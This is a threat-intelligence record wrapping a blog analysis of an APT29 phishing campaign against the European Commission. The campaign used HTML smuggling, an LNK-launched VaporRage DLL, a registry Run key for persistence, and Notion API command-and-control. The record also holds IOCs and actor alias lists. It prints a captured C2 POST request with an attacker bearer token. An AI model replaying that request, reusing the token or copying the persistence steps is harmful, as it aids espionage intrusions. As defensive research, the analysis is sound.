{
	"id": "c35a28ed-6464-4d00-9987-0e87046e6295",
	"created_at": "2026-04-06T00:17:05.971066Z",
	"updated_at": "2026-04-10T03:37:33.21705Z",
	"deleted_at": null,
	"sha1_hash": "fb0c003e4f7cb3413a5303e9e563316f5667bb8e",
	"title": "Sophisticated APT29 Campaign Abuses Notion API to Target the European Commission",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2253691,
	"plain_text": "Sophisticated APT29 Campaign Abuses Notion API to Target the European Commission\r\nBy Gianluca Tiepolo\r\nPublished: 2023-03-30 · Archived: 2026-04-05 18:36:22 UTC\r\nResearch by Gianluca Tiepolo\r\nA map of Russia, as imagined by DALL·E\r\nhttps://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58\r\nPage 1 of 14\n\nAPT29 is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been involved in several high-profile cyberattacks against government agencies, NGOs, and IT service providers. The group has been known to use a range of techniques for its C2 communications, repeatedly abusing legitimate social media services to blend into normal network traffic and avoid detection. This analysis documents APT29’s abuse of Notion, the popular note-taking application, which was used as a C2 channel in a recent campaign targeting the European Commission.\r\nAPT29 is a highly sophisticated Advanced Persistent Threat (APT) group that has been attributed to Russia’s Foreign Intelligence Service (SVR). 
The group has been active since at least 2008 and has been involved in a wide range of espionage and cyber-attack campaigns targeting governments, military organizations, defense contractors, and various industries in the United States, Europe, and Asia.\r\nAPT29 is also known as NOBELIUM (Microsoft), Cozy Bear (Crowdstrike), The Dukes (Kaspersky), JACKMACKEREL (iDefense), BlueBravo (Recorded Future) and UNC2452 (FireEye).\r\nThe group is known for its subtle and sophisticated tradecraft in stealing geopolitical intelligence: unlike other Russian state-sponsored groups such as APT28 or Sandworm, APT29 has not been linked to destructive operations and operates with much more discretion.\r\nThe group has been attributed to a number of high-profile cyberattacks, including:\r\nThe 2016 Democratic National Committee (DNC) hack: APT29 was one of the two Russian groups responsible for the cyberattack on the DNC during the 2016 U.S. presidential election. The group gained access to the DNC’s email system and stole sensitive information, which was subsequently leaked to the public.\r\nThe SolarWinds supply chain attack: APT29 was attributed to the highly sophisticated supply chain attack against SolarWinds, a leading IT management software provider. The attack allowed the group to gain access to the systems of several U.S. government agencies, including the Department of Justice, the Department of State, and the Department of Homeland Security.\r\nIn May 2021, it was revealed that APT29 was responsible for a large-scale cyberattack on multiple U.S. government agencies and private companies, including Microsoft. The group used a compromised email marketing system to send spear-phishing emails to over 3,000 individual accounts, resulting in the installation of a backdoor that allowed the attackers to gain access to the victims’ networks. 
The group has also been linked to other significant cyberattacks, including the theft of COVID-19 research from U.S.-based pharmaceutical companies.\r\nOverall, APT29 is one of the most sophisticated and well-resourced APT groups in the world, and its TTPs are constantly evolving.\r\nTactics, Techniques, and Procedures\r\nAPT29 is known for its patient and persistent targeting of its victims, often using multi-stage attacks that take weeks or even months to complete. Following is a list of the group’s most notable TTPs:\r\nSpear-phishing: the group uses highly targeted and convincing spear-phishing emails to gain access to a target’s system. These emails are usually tailored to the recipient’s interests and appear to come from a trusted source.\r\nWatering hole attacks: APT29 has also been known to use watering hole attacks, where the group compromises a trusted website frequented by the target and then injects malware into the site to infect visitors.\r\nCustom malware: APT29 uses highly customized malware, such as “SeaDuke” and “CosmicDuke,” that is designed to evade detection and maintain persistence on the target system. The group is also known to use well-known tools like “Cobalt Strike” and “PowerShell Empire”.\r\nUse of 0-day exploits: the group is known for its use of zero-day exploits to gain access to target systems. For example, APT29 has been known to use exploits for popular software like Microsoft Office and Adobe Flash.\r\nLiving-off-the-land tactics: APT29 often uses “living-off-the-land” tactics, where the group uses legitimate tools and techniques that are already present on the target system to evade detection. 
This can include tools like PowerShell, Windows Management Instrumentation (WMI), and Remote Desktop Protocol (RDP).\r\nIn this particular research, I focused on analyzing APT29’s command-and-control capabilities.\r\nCommand \u0026 Control\r\nThis threat group has a history of using trusted and legitimate cloud services (such as social media services and Google Drive) for its cyber attacks in an attempt to blend into normal network traffic and evade detection. Malware distributed by APT29 also contains the ability to exfiltrate data over those same C2 channels. For example:\r\nThe group’s MiniDuke malware searched for specific tweets that contained URLs to access C2 servers.\r\nAPT29’s CosmicDuke and PolyglotDuke malware also have the ability to use Twitter to obtain C2 URLs, as well as other social media services like Imgur and Reddit.\r\nAPT29’s HAMMERTOSS backdoor uses GitHub, Twitter, and cloud storage services for C2 communication.\r\nAPT29 has also utilized custom encryption methods, such as those found in the group’s SeaDuke malware, where a unique fingerprint was generated for the infected host and Base64 encoding and RC4/AES encryption were used to layer data during communications with the C2 server. 
The group has also employed techniques such as “domain fronting” and TOR obfuscation plugins to create encrypted network tunnels.\r\nUsing social networks for C2 communications is not an entirely new technique: other Russian groups such as Turla (Venomous Bear) leveraged comments posted to Instagram to obtain the address of their command and control servers.\r\nSource: FireEye, Stealthy Tactics Define a Russian Cyber Threat Group, 2015\r\nAPT29 was spotted using Twitter to control infected machines as early as 2015: in the HAMMERTOSS campaign, the group was able to receive commands and send stolen data through the popular social network, which allowed them to evade detection by security solutions that did not monitor social media traffic.\r\nEnvyScout\r\nIn a more recent campaign dating back to June 2021, APT29 targeted Italian diplomatic organizations with a spear-phishing campaign that distributed the EnvyScout backdoor.\r\nC2 communication through Slack\r\nThe backdoor first calls a function to create a custom Slack channel, adding the attacker’s user ID to the newly created channel. The backdoor gets the user name and hostname of the victim host, adds 4 random numbers to form the name of the channel, and sends an HTTP request with an authorization token to the Slack API. 
After the channel is established, the backdoor enters an infinite loop: it uses the “chat.postMessage” API request to send a beacon message to the newly created channel and receives a response with a list of additional files and payloads that are downloaded and executed on the target machine.\r\nBeatdrop\r\nIn mid-January 2022, APT29 launched yet another spear-phishing campaign targeting a diplomatic entity, which was detected and responded to by Mandiant. During the investigation, Mandiant discovered that the malicious emails were used to distribute the BEATDROP and BOOMMIC downloaders.\r\nBEATDROP is a downloader written in C that leverages Trello for Command-and-Control (C2) communication. Trello is a web-based project management application that allows users to organize tasks and projects using customizable boards, lists, and cards.\r\nWhen executed, BEATDROP maps its own copy of ntdll.dll into memory to execute shellcode in its own process. It creates a suspended thread, then enumerates the system for the username, computer name, and IP address to create a victim ID. This victim ID is used by BEATDROP to store and retrieve victim payloads from its C2. Once the victim ID is created, BEATDROP sends an initial request to Trello to determine if the current victim has already been compromised. The shellcode payload, which is tailored to each victim, is then retrieved from Trello. 
Once the payload has been retrieved, it is deleted from Trello.\r\nNotion for C2 Communication\r\nIn October 2022, ESET Research discovered a sample uploaded to VirusTotal that closely resembled what APT29 had used a few months earlier, with the key difference being that it used Notion, a cloud-based note-taking software platform, for Command-and-Control (C\u0026C) communications.\r\nThe Notion API can be abused for C2 communications by embedding the commands in the Notion workspace, which is accessed by the malware as if it were a legitimate user. This misuse of Notion allows the threat actors to evade detection and bypass security controls, as the traffic between the malware and the Notion server is likely to be perceived as legitimate.\r\nESET researchers suspect that the downloader deployed in this particular campaign was designed to gather and execute additional malicious payloads, such as Cobalt Strike. The campaign has been analyzed in more detail by researchers at Hive Pro and Recorded Future, who identify the sample as the GraphicalNeutrino malware.\r\nAccording to Recorded Future, APT29 utilized a compromised website with a lure text of “Ambassador’s schedule November 2022” to distribute the ZIP file “schedule.zip”, suggesting that the targets of the campaign are related to embassy staff or an ambassador. 
GraphicalNeutrino, the malware used in the operation, serves as a loader with basic C2 capabilities and employs various anti-analysis techniques to avoid detection, including API unhooking and sandbox evasion.\r\nGraphicalNeutrino artifact — 140runtime.dll\r\nAfter establishing persistence, the malware decrypts several strings, including a Notion API key and a database identifier, and calculates a unique ID for the victim based on their username and hostname. It then uses Notion’s API for C2 communication to deliver additional payloads to the victim’s machine.\r\nFor each request to the C2, GraphicalNeutrino parses the JSON-formatted response and searches for a “file” array; if the array is not empty, the malware parses out the URL field, downloads the file and decrypts it using a custom cipher. Once the shellcode is decrypted, it is indirectly spawned in a new thread.\r\nA sample response from Notion C2\r\nThe use of diplomatic lures during times of heightened geopolitical tensions, such as the ongoing war in Ukraine, is likely to be effective for Russian APT groups, given the potential impact of information gathered from compromised entities or individuals on Russian foreign policy and strategic decision-making processes. 
It is perhaps for this reason that APT29 adopted the same tactics — in particular the stealthy C2 communication through Notion — for its next big campaign, this time targeting the European Commission.\r\nAttack against the European Commission\r\nIn this final section of the blog post, I’m dissecting a previously undisclosed campaign attributed to APT29 which targeted the European Commission. The previous introduction to the group’s TTPs and campaigns will hopefully be beneficial to the reader, as this attack shares quite a few similarities with the GraphicalNeutrino campaign that was exposed by Recorded Future.\r\nInitial Access\r\nBeginning mid-February 2023, a spear-phishing campaign targeted a number of email addresses related to members of the European Commission. The attack involved the distribution of a malicious .iso image that contained a new sample of the VaporRage downloader. Once executed, the malware was observed exploiting the Notion API to deploy Cobalt Strike beacons.\r\nExecution flow for the attack targeting the European Commission\r\nThe first phishing email, sent on 13 February 2023, masqueraded as an administrative notice related to documents available to download from eTrustEx, a web-based exchange platform that ensures secure transmission of documents between members of the Commission. The decoy emails are written in English and were delivered to a very small, targeted group of key people who use the eTrustEx platform.\r\nLure email delivered to the European Commission\r\nIn addition, I noticed that in different samples of the email, the senders are probably compromised email accounts belonging to legitimate government organizations. 
This could lead victims to believe that the emails came from reliable partners, making it more likely for recipients to click on the links.\r\nWhen the link is opened, the victim is redirected to a malicious HTML page hosted at hxxps://literaturaelsalvador[.]com/Instructions.html which makes use of a technique known as HTML Smuggling to download an ISO image to the target system. I believe that this domain is not actor-owned but has been compromised, which aligns with previous APT29 activity.\r\nLure website\r\nThe ISO file is set to auto-download when the website is visited by the victim; this is achieved through the following JavaScript code. The contents of Instructions.iso are stored in the d variable.\r\nJS Code which downloads the first-stage payload\r\nExecution\r\nOnce the file has been written to disk, when a user double-clicks on it in Windows 10 or later, the image is mounted and the folder contents are displayed in Windows Explorer. The ISO contains two files — a Windows shortcut file (Instructions.lnk) and a malicious DLL (BugSplatRc64.dll).\r\nIf the user clicks on the LNK file, the following command runs, unintentionally triggering the execution of the malicious DLL.\r\nExecution of the malicious DLL\r\nUsing LNK shortcuts to execute malicious DLLs is a technique that has been associated with APT29 in a number of campaigns. 
In this particular scenario, I recognized the sample as VaporRage, a downloader that has been used by APT29 since 2021.\r\nPersistence\r\nWhen executed with the InitiateDs export, VaporRage first runs a few reconnaissance commands and generates a host-id by hex-encoding the DNS domain and username. Then, it creates a copy of itself at:\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\DsDiBacks\\BugSplatRc64.dll\r\nVaporRage creates a copy of itself\r\nVaporRage then establishes persistence on the compromised system by creating a registry run key located at:\r\n\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DsDiBacks\r\nVaporRage establishes persistence through a registry key\r\nCommand and Control\r\nAs I mentioned at the start of this post, the VaporRage sample delivered in the execution chain implements its command-and-control by communicating over HTTPS using Notion APIs. Notion’s database feature is also used to store victim information and stage further payloads for download.\r\nPCAP collected during C2 communication\r\nBased on my observations, this VaporRage sample periodically executes a POST request to the Notion API to check the availability of a second-stage malware payload, which is then retrieved and executed in memory. 
In this particular campaign, APT29 used VaporRage to distribute Cobalt Strike beacons to further establish a foothold within the environment.\r\nFollowing is a sample POST request towards api.notion.com (104[.]18.42.99):\r\nPOST /v1/databases/37089abc0926463182bb5343bce252cc/query HTTP/1.1\r\ncontent-type: application/json\r\naccept: application/json\r\nnotion-version: 2022-06-28\r\nauthorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.19\r\nHost: api.notion.com\r\nContent-Length: 79\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n{\"filter\":{\"property\":\"Name\",\"rich_text\":{\"equals\":\"VKoMr3830\"}},\"page_size\":1}\r\nThis technique exemplifies APT29’s ongoing attempts to obscure its actions and maintain continuous access to target systems. This has been documented thoroughly by Mandiant, who have described APT29 using a variety of techniques, including scheduled tasks, run keys, malicious certificates, and in-memory backdoors, sometimes utilizing multiple methods for each target.\r\nOverall, the use of cloud services such as Trello and Notion for C2 communications not only provides a threat actor with increased capabilities for evasion of network security controls, but also increases resilience to law enforcement takedowns: social media and cloud services are often hosted on multiple servers and locations, making it more difficult for authorities to take down the entire platform. This means that the threat actor can continue to use the platform for C2 communications even if some servers are taken down. 
These advantages make it an attractive option for threat groups such as APT29 to conduct their malicious activities.\r\nConclusions\r\nThe range of tactics, techniques, and procedures (TTPs) used by APT29 in this campaign supports the conclusion that their objective is to establish numerous means of long-term access to facilitate espionage-related intelligence gathering within the targeted government entities’ networks. Nations that have a connection to the Ukraine crisis, specifically those with significant geopolitical, economic, or military ties to Russia or Ukraine, face a heightened risk of being targeted by APT29.\r\nThis threat group has shown an impressive ability to adapt swiftly during their operations. They use innovative and unique methods to circumvent detection and authentication requirements in their target environments. In their recent operations, the group has demonstrated a deep understanding of operational security, enabling them to move seamlessly between on-premises and cloud resources with minimal use of malware. 
These factors, combined with their advanced malware development skills, long history of operations, and extended time on targets, indicate that APT29 is a well-funded and exceptionally sophisticated actor and will definitely continue to be a threat during 2023.\r\nIOCs\r\nFollowing is a list of indicators associated with this campaign.\r\nDomains\r\nhxxps://literaturaelsalvador[.]com/instructions.html\r\nhxxps://api[.]notion[.]com/v1/databases/37089abc0926463182bb5343bce252cc/query\r\nIPs\r\n108[.]167.180.186\r\n104[.]18.42.99\r\nFiles — SHA256\r\n21a0b617431850a9ea2698515c277cbd95de4e59c493d0d8f194f3808eb16354 (Instructions.iso)\r\ne957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98 (BugSplatRc64.dll)\r\nAbout the Author — Gianluca Tiepolo\r\nI’m a cybersecurity researcher who specializes in digital forensics and incident response for the telecommunications industry. Over the past 12 years, working as a consultant, I have performed forensic analysis, threat hunting, incident response, and Cyber Threat Intelligence analysis for dozens of organizations, including several Fortune® 100 companies. In 2013, I co-founded the startup Sixth Sense Solutions, which developed AI-based antifraud solutions.\r\nToday, I work as a Cyber Threat Intelligence (CTI) Team Lead for Accenture Security.\r\nI love writing and sharing my knowledge: in 2016 I authored the book “Getting Started with RethinkDB”, and in 2022 I wrote “iOS Forensics for Investigators”, both published by Packt Publishing.\r\nSource: https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58"
	],
	"report_names": [
		"sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
